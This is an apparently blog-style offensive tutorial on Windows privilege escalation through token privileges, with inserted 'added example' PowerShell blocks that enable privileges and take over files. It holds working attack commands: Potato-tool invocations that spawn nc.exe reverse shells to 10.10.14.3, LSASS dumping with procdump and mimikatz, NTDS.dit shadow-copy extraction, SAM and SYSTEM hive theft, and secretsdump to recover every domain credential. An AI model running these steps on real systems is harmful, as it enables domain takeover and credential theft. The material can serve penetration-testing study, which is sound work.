Critical Windows User Privileges for Windows Privesc

Hacer Dalkiran
6 min read · Nov 14, 2024


After gaining a foothold on a Windows machine, the next major step is privilege escalation. It can be done with kernel exploits, UAC bypass techniques, abuse of misconfigured Windows privileges, and so on.

In this writeup, I will explain the privileges that we can exploit. Let's list the privileges our current token holds with:

whoami /priv

NOTE: "Disabled" does not mean that we lack the privilege. It means the token holds the privilege but it is currently switched off, and any process running under our account can switch it on (enable it) before use. Only a privilege that is absent from the list is one we do not have. The most commonly exploited privileges are the following:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeSecurityPrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege
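A small triage helper for the list above, added here as an example and not part of the original post: it parses the output of whoami /priv, keeps only the high-value privileges, and reports whether each is Enabled or merely held but Disabled. The sample output it runs against is constructed (it resembles what a typical MSSQL service account returns); on a live host, call the function with no arguments.

```powershell
# Added example (not from the original post): flag commonly abused privileges
# in `whoami /priv` output, whether Enabled or Disabled. A Disabled privilege
# is still held and can be enabled; only absence from the list means "not held".

$HighValuePrivs = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeTcbPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeSecurityPrivilege',
    'SeCreateTokenPrivilege', 'SeLoadDriverPrivilege',
    'SeTakeOwnershipPrivilege', 'SeDebugPrivilege'
)

function Get-InterestingPrivilege {
    param(
        # Raw lines of `whoami /priv`; defaults to running the command live.
        [string[]]$WhoamiOutput = (whoami /priv)
    )
    foreach ($line in $WhoamiOutput) {
        # Data rows look like: "SeBackupPrivilege   Back up files and directories   Disabled"
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            $name  = $Matches[1]
            $state = $Matches[3]
            if ($HighValuePrivs -contains $name) {
                [pscustomobject]@{
                    Privilege   = $name
                    State       = $state
                    Description = $Matches[2].Trim()
                    Note        = if ($state -eq 'Disabled') { 'held but disabled: enable before use' } else { 'ready to use' }
                }
            }
        }
    }
}

# Constructed sample so the function can be exercised without a target host.
$Sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Get-InterestingPrivilege -WhoamiOutput $Sample | Format-Table -AutoSize
# On a live host: Get-InterestingPrivilege
```

For the sample above the function returns two rows: SeAssignPrimaryTokenPrivilege (Disabled, held but disabled) and SeImpersonatePrivilege (Enabled, ready to use), which is exactly the pair the Potato family of tools needs.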

SeImpersonatePrivilege

Microsoft's definition: this policy setting determines which programs are allowed to impersonate a user or another specified account and act on behalf of that user.

In Windows, every process has an access token that describes the account it runs as. A token is a kernel object that a process references by handle; it is not something an unprivileged user can read out of memory or forge. To make use of another account's token (impersonate it, or start a process with it), the caller needs SeImpersonatePrivilege. By default it is granted to members of Administrators and to the built-in service identities (LOCAL SERVICE, NETWORK SERVICE, SERVICE), which is why IIS application pool identities and the MSSQL service account usually hold it, and it can be removed from accounts that do not need it during system hardening.

Legitimate programs may use another process's token to escalate from Administrator to Local System, which has additional privileges. A common way to do this is to open a SYSTEM process such as winlogon.exe, duplicate its token, and run with that token. Attackers abuse the same privilege in the "Potato style" privescs, where a service account holds SeImpersonatePrivilege but is not SYSTEM. Essentially, a Potato attack coerces a process running as SYSTEM into authenticating to a listener the attacker controls; the attacker then impersonates that connection and receives a SYSTEM token to use.

An example: connecting to MSSQL

We can connect to a remote MSSQL server with mssqlclient.py from the impacket toolkit.

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

We can run OS commands from the SQL session with xp_cmdshell. It is usually off, so first we need to enable it (enable_xp_cmdshell is a mssqlclient.py helper that does this through sp_configure; it requires sysadmin rights). If our login lacks those rights, we may first have to impersonate another SQL login that has them.

enable_xp_cmdshell
xp_cmdshell whoami

If whoami /priv shows SeImpersonatePrivilege, we can run a Potato.

This privilege can be used to impersonate a privileged account such as NT AUTHORITY\SYSTEM. JuicyPotato can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.

sudo rlwrap nc -lnvp 8443
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

JuicyPotato doesn’t work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.

PrintSpoofer

This tool can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.

sudo rlwrap nc -lnvp 8443
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service, or to help with troubleshooting, a user might be assigned SeDebugPrivilege instead of being added to the Administrators group. The privilege lets us open any process, including those running as SYSTEM, with full access.

whoami /priv

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.

procdump.exe -accepteula -ma lsass.exe lsass.dmp

After creating the dump, we can parse it offline with Mimikatz:

mimikatz.exe
mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Bingo! We get the cached credentials (NTLM hashes and, on older or weakly configured hosts, plaintext passwords) of every account that has logged on since boot.

We can also create the LSASS dump from Task Manager: go to the Details tab, find lsass.exe, right-click it and choose "Create dump file". Task Manager runs as our user, so this only works when our token holds SeDebugPrivilege (or we are an administrator).

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any “securable object,” meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes. This privilege assigns WRITE_OWNER rights over an object, meaning the user can change the owner within the object’s security descriptor.

With this privilege, a user could take ownership of any file or object and make changes that lead to access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DoS).

The privilege is listed as Disabled. We can enable it in our current token with the following script:

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
whoami /priv

Now we can use the takeown Windows binary to change ownership of the file.

takeown /f 'C:\Users\SQLSA\Desktop\cred.txt'

Ownership alone does not grant read access, so we may still be unable to read the file. The owner can always rewrite the file's DACL, though, so we use icacls to grant ourselves access:

icacls 'C:\Users\SQLSA\Desktop\cred.txt' /grant Dalkiran:F
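The same procedure end to end, as an added example rather than the post's own code: it enables a privilege that whoami /priv reports as Disabled using the Win32 calls the EnableAllTokenPrivs script wraps (OpenProcessToken, LookupPrivilegeValue, AdjustTokenPrivileges), then takes ownership of a file and grants the current account read access. The file path is the placeholder from the text; the function works for any held privilege, so the same call enables SeDebugPrivilege before running a process-dumping tool that does not enable it itself.

```powershell
# Added example (not from the original post): enable a held-but-disabled
# token privilege, then use SeTakeOwnershipPrivilege on a file.
# $Target is a placeholder path; $Me is whatever account the shell runs as.

if (-not ('TokenPriv' -as [type])) {
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TokenPriv {
    [StructLayout(LayoutKind.Sequential)]
    public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)]
    public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    public const uint SE_PRIVILEGE_ENABLED    = 0x00000002;
    public const uint TOKEN_ADJUST_PRIVILEGES = 0x00000020;
    public const uint TOKEN_QUERY             = 0x00000008;
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll,
        ref TOKEN_PRIVILEGES newState, uint bufferLength, IntPtr previousState, IntPtr returnLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr handle);
}
'@
}

function Enable-TokenPrivilege {
    # Works for any privilege the token already holds,
    # e.g. SeTakeOwnershipPrivilege, SeDebugPrivilege, SeBackupPrivilege.
    param([Parameter(Mandatory)][string]$Name)

    $token  = [IntPtr]::Zero
    $access = [TokenPriv]::TOKEN_ADJUST_PRIVILEGES -bor [TokenPriv]::TOKEN_QUERY
    $proc   = [System.Diagnostics.Process]::GetCurrentProcess().Handle
    if (-not [TokenPriv]::OpenProcessToken($proc, $access, [ref]$token)) {
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $luid = New-Object 'TokenPriv+LUID'
        if (-not [TokenPriv]::LookupPrivilegeValue($null, $Name, [ref]$luid)) {
            throw "LookupPrivilegeValue failed for $Name"
        }
        $tp = New-Object 'TokenPriv+TOKEN_PRIVILEGES'
        $tp.PrivilegeCount = 1
        $tp.Luid           = $luid
        $tp.Attributes     = [TokenPriv]::SE_PRIVILEGE_ENABLED
        [void][TokenPriv]::AdjustTokenPrivileges($token, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
        # AdjustTokenPrivileges returns TRUE even when nothing changed; the real
        # signal is ERROR_NOT_ALL_ASSIGNED (1300): the token never held $Name.
        if ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq 1300) {
            throw "$Name is not held by this token, so it cannot be enabled"
        }
    } finally {
        [void][TokenPriv]::CloseHandle($token)
    }
}

$Target = 'C:\Users\SQLSA\Desktop\cred.txt'   # placeholder path from the post
$Me     = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

Enable-TokenPrivilege -Name 'SeTakeOwnershipPrivilege'
whoami /priv | Select-String 'SeTakeOwnershipPrivilege'   # now reads Enabled

# Child processes inherit the enabled privilege, so takeown can use it.
takeown /f $Target
# Ownership does not grant read access by itself, but the owner may always
# rewrite the DACL: grant ourselves Full control, then read the file.
icacls $Target /grant "${Me}:F"
Get-Content $Target
```

The ERROR_NOT_ALL_ASSIGNED check matters in practice: AdjustTokenPrivileges silently succeeds on a token that does not hold the privilege, so without it a script reports success and then takeown fails with "Access is denied".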

We can use this misconfiguration to reach the following critical files:

c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

We may also come across .kdbx KeePass database files, OneNote notebooks, files such as passwords.*, pass.*, creds.*, scripts, other configuration files, virtual hard drive files, and more that we can target to extract sensitive information from to elevate our privileges and further our access.

SeBackupPrivilege

After landing on a machine, we can use the command whoami /groups to show our current group memberships. Let's examine the case where we are a member of the Backup Operators group. Membership of this group grants the SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege allows us to traverse any folder and list its contents, and to copy a file out of a folder even if there is no access control entry (ACE) for us in the folder's access control list (ACL). However, we can't do this with the standard copy command: the file has to be opened with the FILE_FLAG_BACKUP_SEMANTICS flag, which tells the kernel to honour the backup privilege instead of the ACL, so we need a tool that does so programmatically.

The SeBackupPrivilege PowerShell cmdlets (two DLLs) do exactly that. Import them, enable the privilege in the current token, then copy:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege Source\file.txt Destination\file.txt

Then we can read the copy. On a domain controller this misconfiguration is enough to compromise the whole Active Directory domain.

Attacking a Domain Controller — Copying NTDS.dit

The NTDS.dit file contains the NTLM hashes for all user and computer objects in the domain. It is held open by the directory service, so it is locked, and it is not accessible to unprivileged users anyway.

Because NTDS.dit is locked, we use the Windows diskshadow utility to create a volume shadow copy of the C drive and expose it as the E drive. The copy of NTDS.dit inside the shadow is not in use by the system, so it can be read (with SeBackupPrivilege) and copied out:

diskshadow.exe /s C:\Tools\shadow.txt    (shadow.txt contains: add volume C: alias cdrive / create / expose %cdrive% E:)
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Backing up SAM and SYSTEM Registry Hives

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

Let's use them to extract the Administrator hash.

With ntds.dit and the SYSTEM hive extracted, we can use a tool such as secretsdump.py or the PowerShell DSInternals module to recover all Active Directory account credentials. With DSInternals, the boot key from the SYSTEM hive decrypts the database:

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM.SAV
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

Or, with impacket's secretsdump.py (LOCAL tells it to parse the copied files offline instead of talking to a host):

secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL
